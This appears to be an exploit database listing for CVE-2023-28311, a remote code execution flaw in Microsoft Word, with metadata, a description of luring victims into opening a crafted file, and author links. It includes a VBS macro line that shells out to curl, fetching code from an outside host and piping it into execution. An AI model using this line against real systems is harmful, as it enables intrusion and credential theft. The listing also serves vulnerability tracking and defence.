Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)

vendor:

Word

by:

nu11secur1ty

7.5

CVSS

HIGH

Remote Code Execution (RCE)

284

CWE

Product Name: Word

Affected Version From: 16.72.23040900

Affected Version To: 16.72.23040900

Patch Exists: YES

Related CWE: CVE-2023-28311

CPE: a:microsoft:word:16.72.23040900

Metasploit: https://www.rapid7.com/db/vulnerabilities/office-for-mac-cve-2023-28311/, https://www.rapid7.com/db/vulnerabilities/microsoft-office-cve-2023-28311/

Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=148461

Platforms Tested:

2023

Microsoft Word 16.72.23040900 – Remote Code Execution (RCE)

The attack itself is carried out locally by a user with authentication to the targeted system. An attacker could exploit the vulnerability by convincing a victim, through social engineering, to download and open a specially crafted file from a website which could lead to a local attack on the victim's computer. The attacker can trick the victim to open a malicious web page by using a `Word` malicious file and he can steal credentials, bank accounts information, sniffing and tracking all the traffic of the victim without stopping - it depends on the scenario and etc.

Mitigation:

The mitigation for this vulnerability is to ensure that all users are aware of the risks of downloading and opening files from untrusted sources. Additionally, users should be trained to recognize and avoid social engineering attacks.

Source

Exploit-DB raw data:

## Exploit Title: Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 04.14.2023
## Vendor: https://www.microsoft.com/
## Software:
https://www.microsoft.com/en-us/microsoft-365/word?activetab=tabs%3afaqheaderregion3
## Reference:
https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-ID: CVE-2023-28311

## Description:
The attack itself is carried out locally by a user with authentication to
the targeted system. An attacker could exploit the vulnerability by
convincing a victim, through social engineering, to download and open a
specially crafted file from a website which could lead to a local attack on
the victim's computer. The attacker can trick the victim to open a
malicious web page by using a `Word` malicious file and he can steal
credentials, bank accounts information, sniffing and tracking all the
traffic of the victim without stopping - it depends on the scenario and etc.

STATUS: HIGH Vulnerability

[+]Exploit:
The exploit server must be BROADCASTING at the moment when the victim hit
the button of the exploit!

```vbs
  Call Shell("cmd.exe /S /c" & "curl -s
http://tarator.com/ChushkI/ebanie.tarator | tarator", vbNormalFocus)
```

## Reproduce:
[href](
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28311)

## Reference:
[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28311)

[href](
https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/)

## Proof and Exploit
[href](https://streamable.com/s60x3k)

## Time spend:
01:00:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>